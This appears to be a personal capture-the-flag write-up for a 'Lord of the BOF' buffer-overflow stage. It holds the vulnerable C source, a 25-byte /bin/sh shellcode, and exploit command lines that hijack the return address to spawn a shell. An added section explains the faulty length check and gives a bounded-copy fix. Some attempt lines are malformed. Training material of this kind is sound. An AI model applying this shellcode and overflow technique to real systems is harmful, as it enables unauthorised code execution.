[lob] wolfman -> darkelf
    Study/LOB 2014. 7. 30. 20:03

    [wolfman@localhost wolfman]$ cat darkelf.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - darkelf
            - egghunter + buffer hunter + check length of argv[1]
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* memset, strlen, strcpy */

    extern char **environ;

    int main(int argc, char *argv[])
    {
        char buffer[40];
        int i;

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        // egghunter: wipe every environment string so no shellcode survives there
        for(i=0; environ[i]; i++)
            memset(environ[i], 0, strlen(environ[i]));

        // the byte that lands on the high byte of the return address must be 0xbf (stack)
        if(argv[1][47] != '\xbf')
        {
            printf("stack is still your friend.\n");
            exit(0);
        }

        // check the length of argument (48 bytes still overflows the 40-byte buffer)
        if(strlen(argv[1]) > 48){
            printf("argument is too long!\n");
            exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter: clear the buffer so shellcode cannot run from it
        memset(buffer, 0, 40);
    }
    [wolfman@localhost wolfman]$
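The length check above is measured against the wrong bound: the destination is buffer[40], yet 48 bytes are accepted, and those extra bytes are exactly what the 44-byte filler plus 4-byte address in the session below overwrites. As an added example (not the LOB challenge source; function names are my own), here is the hardened counterpart that compares against the destination size and copies with an explicit bound, alongside a count of the lengths darkelf lets through that overflow.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* same size as darkelf's buffer[40] */

/* Copies arg into buf only if it fits together with the NUL terminator.
 * Returns 0 on success, -1 if the argument would overflow buf. */
int copy_arg_checked(char *buf, size_t bufsz, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= bufsz)
        return -1;             /* needs n+1 bytes, only bufsz available */
    memcpy(buf, arg, n + 1);   /* bounded copy, terminator included */
    return 0;
}

/* darkelf's original test, kept for comparison: it accepts lengths
 * 40..48, every one of which overflows buffer[40]. */
int darkelf_length_check_accepts(size_t n)
{
    return n <= 48;
}

/* 1 if an n-byte argument of 'a's passes the hardened check, else 0. */
int fits_hardened(size_t n)
{
    char buf[BUF_SIZE], arg[64];
    if (n > 63)
        return 0;
    memset(arg, 'a', n);       /* constructed input */
    arg[n] = '\0';
    return copy_arg_checked(buf, sizeof buf, arg) == 0;
}

/* Number of lengths in [0, 48] that darkelf accepts but that do not fit:
 * 40, 41, ..., 48, i.e. 9 overflowing lengths. */
int count_overflowing_lengths(void)
{
    int bad = 0;
    for (size_t n = 0; n <= 48; n++)
        if (darkelf_length_check_accepts(n) && !fits_hardened(n))
            bad++;
    return bad;
}

int main(void)
{
    printf("lengths accepted by darkelf that overflow buffer[40]: %d\n",
           count_overflowing_lengths());
    return 0;
}
```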

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

    25-byte shellcode

    ltrace ./elf `python -c'print "a"*19"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x19\xfa\xff\xbf"'

    ltrace ./elf `python -c'print "\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x19\xfa\xff\xbf"'`

    [wolfman@localhost wolfman]$ ./elf `python -c'print "a"*44+"\x45\xfc\xff\xbf"'` `python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
    // put the shellcode in argv[2] and jump to its address

    ltrace ./dark `python -c'print "a"*44+"\x0d\xfc\xff\xbf"'` `python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

    [wolfman@localhost wolfman]$ ./darkelf `python -c'print "a"*44+"\x0f\xfc\xff\xbf"'` `python -c'print "\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?
    bash$ my-pass
    euid = 506
    kernel crashed
    bash$
